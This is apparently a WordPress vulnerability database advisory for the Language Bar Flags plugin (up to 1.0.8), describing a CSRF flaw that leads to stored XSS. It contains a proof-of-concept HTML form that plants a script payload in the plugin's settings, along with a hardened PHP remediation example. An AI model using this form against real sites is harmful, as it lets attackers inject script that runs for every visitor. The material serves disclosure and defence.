WordPress Plugin Vulnerabilities
Language Bar Flags <= 1.0.8 - CSRF to Stored XSS
Description
The plugin does not have any CSRF check in place when saving its settings, and does not sanitise or escape them when generating the flag bar in the frontend. This could allow attackers to make a logged-in admin change the settings and set a Cross-Site Scripting payload in them, which will be executed in the frontend for all users.
Proof of Concept
<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=langbf" method="POST">
      <input type="hidden" name="options_update" value="1" />
      <input type="hidden" name="langbf_active" value="yes" />
      <input type="hidden" name="langbf_title" value="<script>alert(/XSS/)</script>" />
      <input type="hidden" name="langbf_position" value="top" />
      <input type="hidden" name="langbf_side" value="left" />
      <input type="hidden" name="langbf_disable_wpbar" value="yes" />
      <input type="hidden" name="langbf_new_window" value="no" />
      <input type="hidden" name="Submit" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Then view the homepage of the blog to trigger the XSS.
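A hardened version of the settings save and frontend output for the flaw described above, as an added example that is not the plugin's own code. It assumes the form field names on this page are also the stored option names; the function names, nonce action, output markup and any allowed values not shown in the form are hypothetical.

```php
<?php
// Added example, not the plugin's code. Function names, the nonce action and
// the option names (taken from the form field names) are assumptions.
const LANGBF_NONCE_ACTION = 'langbf_save_settings'; // hypothetical

// Call inside the settings <form> so legitimate submissions carry a nonce.
function langbf_example_nonce_field() {
    wp_nonce_field( LANGBF_NONCE_ACTION, 'langbf_nonce' );
}

function langbf_example_save_settings() {
    if ( empty( $_POST['options_update'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // Dies unless the request carries a valid nonce, so a cross-site
    // auto-submitted form is rejected before any option is written.
    check_admin_referer( LANGBF_NONCE_ACTION, 'langbf_nonce' );

    // Free-text field: strip tags and control characters before storing.
    $title = isset( $_POST['langbf_title'] )
        ? sanitize_text_field( wp_unslash( $_POST['langbf_title'] ) )
        : '';
    update_option( 'langbf_title', $title );

    // Enumerated fields: allowlist, first entry is the fallback (values assumed).
    $allowed = array(
        'langbf_active'        => array( 'no', 'yes' ),
        'langbf_position'      => array( 'top', 'bottom' ),
        'langbf_side'          => array( 'left', 'right' ),
        'langbf_disable_wpbar' => array( 'no', 'yes' ),
        'langbf_new_window'    => array( 'no', 'yes' ),
    );
    foreach ( $allowed as $name => $values ) {
        $value = isset( $_POST[ $name ] ) ? sanitize_key( wp_unslash( $_POST[ $name ] ) ) : '';
        update_option( $name, in_array( $value, $values, true ) ? $value : $values[0] );
    }
}
add_action( 'admin_init', 'langbf_example_save_settings' );

// Frontend: escape on output as well, so a value stored before the fix stays inert.
function langbf_example_render_title() {
    echo '<span class="langbf-title">' . esc_html( get_option( 'langbf_title', '' ) ) . '</span>';
}
```

The nonce check closes the CSRF path, and escaping at output covers payloads that were already saved before the handler was fixed.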
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Vinay Bhuria
Submitter
Vinay Bhuria
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-08-16 (about 2 years ago)
Added
2021-08-16 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)